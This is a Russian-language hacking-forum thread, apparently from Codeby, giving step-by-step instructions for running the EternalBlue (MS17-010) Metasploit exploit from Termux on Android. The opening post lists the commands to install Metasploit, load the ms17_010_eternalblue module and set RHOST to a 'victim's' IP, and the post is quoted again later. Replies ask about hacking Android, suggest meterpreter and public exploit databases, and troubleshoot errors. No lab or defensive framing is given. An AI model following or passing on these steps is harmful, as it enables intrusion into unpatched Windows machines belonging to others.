Решено EternalBlue на Termux

[Xyrox]

Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO

Ссылка скрыта от гостей

4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.

 

[gushmazuko]

Устанавливаем сам Termux из Play Маркета.

Если ставить Termux из

Ссылка скрыта от гостей

, все дополнительные модули будут бесплатны.

 

[Xyrox]

Если ставить Termux из

Ссылка скрыта от гостей

, все дополнительные модули будут бесплатны.

и то правда

 

[Shinobi]

иду я пробовать

 

[Lisenok]

Про установку msf в термукс была уже тема

 

[Lisenok]

metasploit for android помоему называется

 

[Tihon49]

Если ставить Termux из

Ссылка скрыта от гостей

, все дополнительные модули будут бесплатны.

А я что-то и не видел платных модулей для термукс...

 

[Pr0digy~]

А я что-то и не видел платных модулей для термукс...

Привет,на гитхабе лежит исходники )Даже готовые апк для ленивых.

 

[Tihon49]

Привет,на гитхабе лежит исходники )Даже готовые апк для ленивых.

Можно ссылку на то, о чём ты говоришь.
Может ты об этом?

Гитхаб

termux/termux-app

 

[L0CKER2005]

у меня ошибка failed to load module

 

[Tim Pumpkin]

А можно эту фигню для взлома андроид использовать?

 

[persikoff]

@Xyrox, в чем проблема?

 

[KJhgIO]

А можно эту фигню для взлома андроид использовать?

Если вы про еnternablue, то его НЕЛЬЗЯ использовать для взлома андройд.
Этот эксплоит использует уязвимости SMB протокола в WINDOWS! Он нацелен исключительно на ОС Windows и может эксплуатировать только её.

Что касаемо msf - meterpreter в руки.
Эксплоиты для сетевого стека Android в MSF не наблюдал.
Благо в открытом доступе есть обширные бд эксплоитов, уязвимостей. А дальше уже сами

 

[Timofey]

Почему возникает такая ошибка?

 

[L0CKER2005]

Почему возникает такая ошибка?

Какую систему пытаешься взломать? В ошибке сказано что система не уязвима к Eternalblue

 

[ThePavlov]

тема странная, но мне всегда было интересно, это работает только в локальной сети? или нет

 

[swagcat228]

Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO

Ссылка скрыта от гостей

4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.

Лучше поставить arm версию kali, в том же термуксе, запустить ёё посредством chroot или proot
и оттуда, из под кали, уже поставить себе нормальный людской msf